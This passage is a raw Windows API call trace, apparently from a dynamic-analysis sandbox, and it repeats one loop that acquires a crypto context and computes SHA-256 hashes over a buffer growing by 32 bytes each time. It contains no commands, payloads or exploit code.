	[0191.331] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.331] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.332] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0191.332] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.332] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23004b0
	[0191.332] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23004b0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23004b0, pdwDataLen=0x1283b0) returned 1
	[0191.332] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.332] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.332] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.332] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.332] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0191.332] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.332] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23004d8
	[0191.332] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23004d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23004d8, pdwDataLen=0x1283b0) returned 1
	[0191.332] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.332] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.332] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.333] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.333] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0191.333] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.333] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300500
	[0191.333] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300500, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300500, pdwDataLen=0x1283b0) returned 1
	[0191.333] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.333] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.333] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.333] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.333] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0191.333] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.333] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300528
	[0191.333] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300528, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300528, pdwDataLen=0x1283b0) returned 1
	[0191.333] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.333] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.333] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.334] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.334] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0191.334] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.334] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300550
	[0191.334] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300550, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300550, pdwDataLen=0x1283b0) returned 1
	[0191.334] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.334] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.334] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.334] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.334] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0191.334] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.334] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300578
	[0191.334] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300578, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300578, pdwDataLen=0x1283b0) returned 1
	[0191.334] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.335] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.335] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.335] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.335] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0191.335] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.335] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23005a0
	[0191.335] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23005a0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23005a0, pdwDataLen=0x1283b0) returned 1
	[0191.335] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.335] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.335] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.336] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.336] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0191.336] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.336] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23005c8
	[0191.336] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23005c8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23005c8, pdwDataLen=0x1283b0) returned 1
	[0191.336] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.336] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.336] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.336] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.336] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0191.336] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.337] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23005f0
	[0191.337] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23005f0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23005f0, pdwDataLen=0x1283b0) returned 1
	[0191.337] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.337] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.337] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.337] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.337] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0191.337] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.337] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300618
	[0191.337] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300618, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300618, pdwDataLen=0x1283b0) returned 1
	[0191.337] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.337] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.337] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.338] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.338] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0191.338] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.338] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300640
	[0191.338] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300640, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300640, pdwDataLen=0x1283b0) returned 1
	[0191.338] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.338] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.338] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.338] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.338] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0191.338] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.338] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300668
	[0191.338] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300668, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300668, pdwDataLen=0x1283b0) returned 1
	[0191.338] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.338] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.338] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.339] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.339] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0191.339] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.339] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300690
	[0191.339] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300690, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300690, pdwDataLen=0x1283b0) returned 1
	[0191.339] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.339] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.339] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.339] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.339] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0191.339] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.339] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23006b8
	[0191.339] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23006b8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23006b8, pdwDataLen=0x1283b0) returned 1
	[0191.339] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.339] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.339] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.340] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.340] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0191.340] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.340] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23006e0
	[0191.340] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23006e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23006e0, pdwDataLen=0x1283b0) returned 1
	[0191.340] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.340] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.340] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.340] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.340] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0191.340] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.340] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300708
	[0191.340] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300708, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300708, pdwDataLen=0x1283b0) returned 1
	[0191.340] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.340] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.340] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.341] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.341] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0191.341] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.341] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300730
	[0191.341] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300730, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300730, pdwDataLen=0x1283b0) returned 1
	[0191.341] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.341] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.341] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.341] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.341] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0191.341] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.341] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300758
	[0191.341] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300758, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300758, pdwDataLen=0x1283b0) returned 1
	[0191.341] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.342] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.342] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.342] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.342] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0191.342] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.342] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300780
	[0191.342] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300780, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300780, pdwDataLen=0x1283b0) returned 1
	[0191.342] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.342] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.342] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.343] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.343] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0191.343] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.343] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23007a8
	[0191.343] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23007a8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23007a8, pdwDataLen=0x1283b0) returned 1
	[0191.343] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.343] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.343] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.343] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.343] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0191.344] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.344] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23007d0
	[0191.344] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23007d0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23007d0, pdwDataLen=0x1283b0) returned 1
	[0191.344] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.344] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.344] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.344] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.344] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0191.344] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.344] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23007f8
	[0191.344] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23007f8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23007f8, pdwDataLen=0x1283b0) returned 1
	[0191.344] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.344] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.344] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.345] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.345] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0191.345] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.345] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300820
	[0191.345] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300820, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300820, pdwDataLen=0x1283b0) returned 1
	[0191.345] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.345] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.345] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.345] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.345] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0191.345] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.345] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300848
	[0191.345] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300848, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300848, pdwDataLen=0x1283b0) returned 1
	[0191.345] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.345] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.345] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.346] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.346] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0191.346] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.346] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300870
	[0191.346] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300870, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300870, pdwDataLen=0x1283b0) returned 1
	[0191.346] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.346] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.346] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.346] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
